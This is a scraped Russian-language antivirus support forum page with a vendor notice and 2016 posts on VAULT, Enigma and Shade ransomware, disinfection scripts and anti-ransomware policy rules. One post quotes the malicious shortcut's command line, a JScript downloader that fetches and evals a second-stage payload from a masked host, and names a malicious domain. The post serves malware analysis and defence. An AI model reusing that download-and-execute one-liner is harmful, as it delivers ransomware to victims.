Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

Шифровирусы шумной толпою
новая рассылка в почте:
Счет-фактура***.docx.lnk в архиве.
в качестве командной строки в lnk используется скрипт.
[QUOTE]C:\WINDOWS\system32\cmd.exe /c echo var t=new ActiveXObject('MSXML2.XMLHTTP');t.open('GET','http://******',0);t.send();t.open('GET',t.ResponseText,0);t.send();eval(t.ResponseText); > update.js && update.js[/QUOTE]

блокируем адрес:
[QUOTE]*flashbombc4.com*[/QUOTE]
в качестве "заряда" используется шифратор VAULT
Изменено: santy - 14.07.2016 06:08:28
файлы зашифрованы с расширением *.enigma; *.1txt, enigma /Supported file extensions : .enigma, .{number}.enigma, .1txt/
Виталий Султанов,
добавьте образ автозапуска если необходима помощь в очистке системы.

по расшифровке документов, при наличие лицензии на продукт ESET обращайтесь в техподдержку [email protected]

от вас в техподдержку необходима следующая информация:
файл шифратора,
файл ENIGMA_NN.RSA
несколько зашифрованных файлов.
добавлю:
[SIZE=14pt][B][FONT=Times New Roman,Times]информация для тех, кто пострадал от шифратора Enigma:
обращайтесь в техподдержку [email protected] при наличие лицензии.
расшифровка есть в техподдержке.[/FONT][/B][/SIZE]
Изменено: santy - 29.07.2016 05:13:15
Вирус скрыт под Svchost.exe
ставьте систему с проверенного дистра, программы качайте с оф. сайтов, сделайте так же проверку диска, протеструйте ОЗУ
файлы зашифрованы с расширением .better_call_saul, .da_vinci_code, Filecoder.ED / Encoder.858 / Ransom.Shade; ransom_note: README*.txt
Семен Сидоров,
по очистке системы выполните:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.87.4 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
OFFSGNSAVE
zoo %SystemDrive%\TEMP\RAD62572.TMP
addsgn 9A2C51DA5582BC8DF42BAEB164C81205158AFCF6B1FA1F7885C3C5BC0BC2­0978341B0517BA9D686943606871461649FA7DDFE97255DAB02C2D77A42F­A4696F06 64 Multi.Generic [Kaspersky]

zoo %SystemDrive%\TEMP\RADDCE02.TMP
;------------------------autoscript---------------------------

chklst
delvir

deltmp
delnfr
CZOO
;-------------------------------------------------------------

restart
[/code]
архив из каталога uVS (по формату: ZOO_2012-12-31_23-59-59.rar/7z)  отправить в почту [email protected], [email protected]  
------------
по расшифровке не поможем.
Вирус скрыт под Svchost.exe
дождитесь, возможно система обновляется
Защита от шифровальщиков
вот кстати, скрипншоты будущей 8 версии Криптопревента.

[IMG WIDTH=486 HEIGHT=384]https://i1.wp.com/www.foolishit.com/wp-content/uploads/2015/05/cp.png?resize=540%2C427[/IMG]

[IMG WIDTH=485 HEIGHT=384]https://i1.wp.com/www.foolishit.com/wp-content/uploads/2015/05/cp2.png?resize=539%2C427[/IMG]
[ Закрыто] Очистка ПК после win32/filecoder.fh
да, он был в папке автозапуска.
C:\USERS\JULIJAS\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\VAULT.HTA
в остальном система чистая.
[ Закрыто] Очистка ПК после win32/filecoder.fh
Усман Фаткуллин,
добавьте образ автозапуска системы, посмотрим что там осталось
скорее всего файл VAULT.hta в папке автозапуска.
Защита от шифровальщиков
[QUOTE]RP55 RP55 написал:
FireFox создает временную папку в %TEMP%\7z*
Как думаете, насколько замедлится система если использовать сертификаты?
И имеет ли смысл их использовать для одобрения известного ПО

Как мне кажется, используя неограниченный режим, сертификаты проверяются индивидуально, без нагрузки на систему:[/QUOTE]

Вы - разработчик, вам решать данную проблему.
я всего лишь говорю, о том с чем столкнулся на практике. Что правило, которое запрещает запуск исполняемого exe из архива 7z блокирует установку Firefox, Thunderbird

[QUOTE]SUSPICIOUS APPLICATION BLOCKED

Доступ к C:\DOCUME~1\****\LOCALS~1\Temp\7zS1026.tmp\setup.exe был ограничен Администратором по расположению правилом политики {a13b77f7-3d74-43be-8d4b-0c76e9de9963}, расположенной в C:\Documents and Settings\****\Local Settings\Temp\7z*\*.exe[/QUOTE]

поскольку может быть создано порядка сотни правил, то есть необходимость оперативно найти то правило, которое выполняет блокировку полезной программы.
отсюда я делаю вывод о необходимости логов. (как это сделано в Криптопревент)
Защита от шифровальщиков
[QUOTE]mike 1 написал:
[QUOTE]Что делать юзеру? [/QUOTE]Ничего не делать, т.к. программы установятся нормально. Можешь проверить на виртуалке.
[QUOTE]пока я не научил пользоваться Cryptoprevent-ом[/QUOTE]Это не очень надежное решение.[/QUOTE]
mike_1,
в данном случае в Cryptoprevent они используют  только функцию [B]alert - view event log[/B], это проще, чем использовать журнал событий, хотя CP думаю, формирует свои логи именно из журнала событий.

[IMG WIDTH=598 HEIGHT=523]http://s017.radikal.ru/i400/1607/d6/de7f779fad79.jpg[/IMG]

по поводу надежности: все зависит от того какие правила будут созданы.
Минус в бесплатной версии в том, что нельзя редактировать (через интерфейс программы) уже созданную политику.
Второй минус в том, что они что-то долго тянут с беткой 8 версии. Уже второй год пошел.
Изменено: santy - 12.07.2016 04:39:45